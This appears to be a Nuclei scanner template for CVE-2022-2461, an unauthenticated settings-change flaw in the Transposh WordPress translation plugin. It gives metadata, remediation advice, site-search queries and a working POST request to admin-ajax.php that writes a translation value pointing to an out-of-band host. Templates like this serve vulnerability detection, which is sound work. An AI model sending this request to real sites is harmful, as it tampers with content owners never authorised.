id: CVE-2022-2461

info:
  name: Transposh WordPress Translation <= 1.0.8 - Unauthenticated Settings Change
  author: riteshs4hu
  severity: medium
  description: |
    The Transposh WordPress Translation plugin for WordPress is vulnerable to unauthorized setting changes by unauthenticated users in versions up to, and including, 1.0.8.1. This is due to insufficient permissions checking on the 'tp_translation' AJAX action and default settings which makes it possible for unauthenticated attackers to influence the data shown on the site.
  impact: |
    Unauthenticated attackers can modify plugin settings through the tp_translation AJAX endpoint without authentication, potentially manipulating translated content and injecting malicious data that affects all site visitors.
  remediation: |
    Update Transposh WordPress Translation plugin to a version newer than 1.0.8.1 that implements proper authentication checks on AJAX actions.
  reference:
    - https://wpscan.com/vulnerability/56a961b0-66b7-4dbf-a0e4-0cd38c9aa8dd/
    - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2022-2461.txt
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/223373fc-9d78-47f0-b283-109f8e00b802?source=cve
    - https://www.wordfence.com/vulnerability-advisories/#CVE-2022-2461
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-2461
    cwe-id: CWE-862
    epss-score: 0.16923
    epss-percentile: 0.95132
    cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: transposh
    product: transposh_wordpress_translation
    framework: wordpress
    publicwww-query: "/wp-content/plugins/transposh-translation-filter-for-wordpress/"
    fofa-query: body="/wp-content/plugins/transposh-translation-filter-for-wordpress/"
  tags: cve,cve2022,wordpress,wp-plugin,wp,wpscan,transposh-translation-filter-for-wordpress,info-leak,vkev,vuln

variables:
  redirect_uri: "oast.me"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=tp_translation&ln0=en&sr0={{redirect_uri}}&items=1&tk0={{redirect_uri}}&tr0={{redirect_uri}}

    matchers:
      - type: dsl
        dsl:
          - "contains(body, '200 - backup in sync')"
          - "contains(content_type, 'text/html')"
          - "status_code == 200"
        condition: and

    extractors:
      - type: regex
        part: header
        regex:
          - "Transposh: v-[0-9.]+"
# digest: 4a0a0047304502201d806b29954022090c91931ce2a0ac14415370c8df0ec916bb9768a50d15f1fe022100a61d662a93f3e001b983aa6cf3b35d37e3088047d1da00d0ee11780251ce7141:922c64590222798bb761d5b6d8e72950